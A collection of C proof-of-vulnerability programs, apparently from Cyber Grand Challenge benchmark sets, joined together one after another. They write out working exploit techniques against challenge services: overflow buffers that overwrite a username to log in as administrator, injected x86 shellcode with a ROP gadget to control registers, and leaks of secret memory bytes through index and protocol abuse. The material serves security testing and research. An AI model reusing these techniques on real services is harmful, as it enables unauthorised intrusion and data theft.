int main() { type2_vals t2; unsigned char buf[200]; int i; size_t bytes; cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00" "ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA" "TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140); random(buf + 11 + 8 + 24, 12, &bytes); random(buf + 11 + 8 + 24 + 16, 16, &bytes); random(buf + 11 + 0x40 + 8 + 24, 12, &bytes); random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes); for (i = 0; i < 139; i++) { // make sure we didn't introduce any bad chars if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55; if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55; if (buf[i] == 0x7f) buf[i] = 0x3f; if (buf[i] == 0x7e) buf[i] = 0x3e; } type2_negotiate(&t2); transmit_all(STDOUT, buf, 140); length_read(STDIN, buf, 0x58); length_read(STDIN, buf, 16); // buf contains: "Album: ?????????" // as long as buf does not contain "Arti", we have won for (i = 7; i < 16; i++) if (memcmp(&buf[i], "Arti", 4) == 0) break; if (i == 16) { type2_submit(buf + 7, 4); return 0; } // we found "Arti", so look some more length_read(STDIN, buf, 8); type2_submit(buf + 4, 4); return 0; }
int main() { unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N"; char admin_name[] = {12, 34, 56, 78 }; type2_vals t2; type2_negotiate(&t2); int secret = 0; unsigned char buf[200]; unsigned short msg_length = 0; unsigned short register_user_req = 11382; char user_name[] = { 11, 22, 33, 44 }; //Register first user (this user will have name overwritten) transmit_all(STDOUT, ®ister_user_req, sizeof(register_user_req)); msg_length = sizeof(user_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, user_name, sizeof(user_name)); //Logout user unsigned short logout_req = 8719; transmit_all(STDOUT, &logout_req, sizeof(logout_req)); unsigned short login_req = 8711; //Using the login (vulnerable) command overwrite user name of first user transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(exploit) - 1; transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, exploit, sizeof(exploit) - 1); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); //Now login as the administrator transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); unsigned short remote_token_req = 7777; unsigned short page_idx = 100; transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req)); transmit_all(STDOUT, &page_idx, sizeof(page_idx)); unsigned short exit_server = 9999; transmit_all(STDOUT, &exit_server, sizeof(exit_server)); length_read(STDIN, buf, 24); length_read(STDIN, (unsigned char *)(&secret), sizeof(secret)); type2_submit((unsigned char *)(&secret), sizeof(secret)); return 0; }
int main() { type2_vals t2v; unsigned char* ScreenBuf[MAX_LINES]; unsigned LineCnt; #ifndef DEBUG type2_negotiate(&t2v); #else (void)t2v; #endif transmit_all(STDOUT, "l23k", 4); send_string(STDERR, "GOING\n"); LineCnt = ReadScreen(ScreenBuf); for (unsigned Index = 0; Index < 64; ++Index) { send_string(STDERR, "LOOP\n"); send_string(STDOUT, "0\n"); LineCnt = ReadScreen(ScreenBuf); } send_string(STDOUT, "shuf\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "4986\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "4\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "dupr\n"); LineCnt = ReadScreen(ScreenBuf); char* s = (char *)ScreenBuf[LineCnt - 2]; s = strchr(s, ':'); s += 2; int m = strtol(s, NULL, 10); unsigned char secret[4]; cgc_memcpy(secret, (void *)&m, 4); secret[0] ^= 0x14; secret[1] ^= 0x15; secret[2] ^= 0x16; secret[3] ^= 0x17; send_string(STDERR, (char *)s); send_string(STDERR, "----->\n"); type2_submit((unsigned char *)secret, 4); send_string(STDOUT, "quit\n"); }
int main(void) { unsigned int i; unsigned char flag[4] = {0, 0, 0, 0}; negotiate_type2(); for (i = 0; i < sizeof(flag); i++) flag[i] = get_byte(i); type2_submit(flag, sizeof(flag)); transmit_all(STDOUT, "quit\n", sizeof("quit\n") - 1); return 0; }
int main(void) { // negotiate type2_vals t2vals; type2_negotiate(&t2vals); // perform POV char input[11]; ReceiveFromCB(input, 10); char bytes[55] = "ish hostname +p password +l username dump 1128775680 \n"; //print_integer(bytes + 42, t2vals.region_addr); SendToCB(bytes, cgc_strlen(bytes)); unsigned int i = 0xffffffff; SendToCB("quit\n", 5); ReceiveFromCB((char *)&i, 4); type2_submit((unsigned char *)&i, 4); return 0; }
int main(int cgc_argc, char *cgc_argv[]) { unsigned char buf[128]; type1_vals t1; cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1); t1.ipval |= 0x91000000; t1.regval |= 0x91000000; #if 0 unsigned char data[4]; type2_vals t2; type2_negotiate(&t2); /* ... */ type2_submit(data, 4); #endif // query *(unsigned int *)&buf[0] = 36 + 39; *(unsigned int *)&buf[4] = 0x367bae4d; // exe *(unsigned int *)&buf[8] = 0x4E269472; *(unsigned int *)&buf[12] = 0x2000; *(unsigned int *)&buf[16] = 0x2000; *(unsigned int *)&buf[20] = 39; *(unsigned int *)&buf[24] = 0x2020; *(unsigned int *)&buf[28] = 0; *(unsigned int *)&buf[32] = 0x2020; *(unsigned int *)&buf[36] = 0; // gadget (0x90000101): pop ebx, pop ebp, ret cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39); // set ip and ebp *(unsigned int *)&buf[49] = t1.ipval; *(unsigned int *)&buf[60] = t1.regval; cgc_transmit_all(STDOUT, buf, 40 + 39); cgc_length_read(STDIN, buf, 4); return 0; }
int main(void) { #ifndef DEBUG xlat_seed("9an538n9av3;5"); #endif char buf[1024]; int secrets = 0x4347c010; const char* reg = "charlie" EOT_S; const char* sub_self = "s" EOT_S "charlie" EOT_S; const char* start_blub = "b" EOT_S; const char* read_blubs = "r" EOT_S; length_read(0, (unsigned char*)buf, 0x4); #ifndef TESTING unsigned char data[4]; type2_vals t2; type2_negotiate(&t2); #endif send_string(1, reg); length_read(0, (unsigned char*)buf, 0x4); send_string(1, sub_self); send_string(1, start_blub); send_string(1, "adf"); transmit_all(1, &secrets, sizeof(secrets)); send_string(1, EOT_S); send_string(1, read_blubs); length_read(0, (unsigned char*)buf, 0x30); length_read(0, (unsigned char*)buf, 0x4); #ifndef DEBUG size_t client_0_data = 0xb7e004f8; #else size_t client_0_data = 0xb7e000b8; #endif size_t secret_addr = (*(size_t*)buf) + 44; int diff = secret_addr - client_0_data; diff /= 4; int idx = (2 << 29) - diff; _convert_signed(buf, -idx, 10, 0); char tosend[1024]; strcat(tosend, "y"); strcat(tosend, EOT_S); strcat(tosend, "charlie"); strcat(tosend, EOT_S); strcat(tosend, buf); strcat(tosend, EOT_S); send_string(1, tosend); send_string(1, read_blubs); const char* cgc_exit = "e" EOT_S; send_string(1, cgc_exit); #ifndef TESTING length_read(0, (unsigned char*)buf, 336); length_read(0, data, 4); type2_submit(data, 4); #endif return 0; }
int play_hi_lo(int scored_game) { unsigned char len_resp[128]; unsigned int resp_len = 0; unsigned char *resp = NULL; char *guess_msg = malloc(128); char *guess_buf = malloc(128); char *select_guess_num_game = "2\n"; char *pov_guess_num = "-1\n"; char *normal_guess_num = "0\n"; int num_guesses = 33; int guess_lower = -2147483647; int guess_upper = 2147483647; int guess = 0; int won = 0; if (scored_game) { pov_guess_num = normal_guess_num; num_guesses = 16; guess_upper = 0xffff; guess_lower = 0; guess = (guess_upper - guess_lower) / 2; } read_until_game_prompt(); length_read(STDIN, len_resp, cgc_strlen("Game # ")); transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game)); length_read(STDIN, len_resp, cgc_strlen("Enter max value (Default=65535): ")); transmit_all(STDOUT, pov_guess_num, cgc_strlen(pov_guess_num)); if (!scored_game) { length_read(STDIN, len_resp, 1); if (len_resp[0] == 'E') { length_read(STDIN, len_resp, cgc_strlen("nter max value (Default=65535): ")); transmit_all(STDOUT, normal_guess_num, cgc_strlen(normal_guess_num)); num_guesses = 16; guess_upper = 0xffff; guess_lower = 0; guess = (guess_upper - guess_lower) / 2; } else { delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1); delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1); num_guesses = 33; } } while(num_guesses) { cgc_memset(guess_buf, 0, 128); cgc_memset(guess_msg, 0, 128); cgc_memset(len_resp, 0, 128); sprintf(guess_buf, "%d\n", guess); sprintf(guess_msg, "Guess the number [%d guesses left]: ", num_guesses--); length_read(STDIN, len_resp, cgc_strlen(guess_msg)); transmit_all(STDOUT, guess_buf, cgc_strlen(guess_buf)); delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1); if (memcmp(resp, "Too Low", 7) == 0) { guess_lower = guess; guess += (guess_upper - guess_lower) / 2; } else if(memcmp(resp, "Too High", 8) == 0) { guess_upper = guess; guess -= (guess_upper - guess_lower) / 2; } else if(memcmp(resp, "You won!", 8) == 0) { won = 1; break; } } if (!won) { delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1); if (memcmp(resp, "Sorry", 5) == 0) { //transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit)); return 0; } } //If POV type2_submit((void *)&guess, sizeof(int)); return 1; }
int main(void) { negotiate_type2(); unsigned char flag[4] = {0, 0, 0, 0}; do { //*** writing data static unsigned char write_00000_00000[] = "\x03\x03\x03\x03"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 3; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); // first 3 byte of flag come from stamp0 for (int i = 0; i < 3; i++) flag[i] = read_00000[i]; if (read_00000_res) {} //silence unused variable warning //**** cgc_read assign to var "stamp0" from slice assign_from_slice("stamp0", read_00000, read_00000_len - read_00000_ptr, 0, 3, 0); free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 2; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00001_00000[] = "\x04\x04"; read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 2); free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x03\x03\x03\x03"; static unsigned int write_00001_00000_len = 4; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 3; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); // 4th byte of flag comes from stamp1 flag[3] = read_00002[0]; if (read_00002_res) {} //silence unused variable warning //**** cgc_read assign to var "stamp1" from slice assign_from_slice("stamp1", read_00002, read_00002_len - read_00002_ptr, 0, 3, 0); free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 2; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x04\x04"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 2); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x00\x0f\xf0\xff"; static unsigned int write_00002_00000_len = 4; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00004_00000[] = "\x04\x17"; read_00004_ptr += data_match(read_00004 + read_00004_ptr, read_00004_len - read_00004_ptr, match_00004_00000, 2); free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); //*** submitting type 2 POV results // submit_type2("flag"); type2_submit(flag, 4); }
void fail() { unsigned char x[4]; const unsigned char* x_addr = (unsigned char*) &x; type2_submit(x_addr, 4); _terminate(-1); }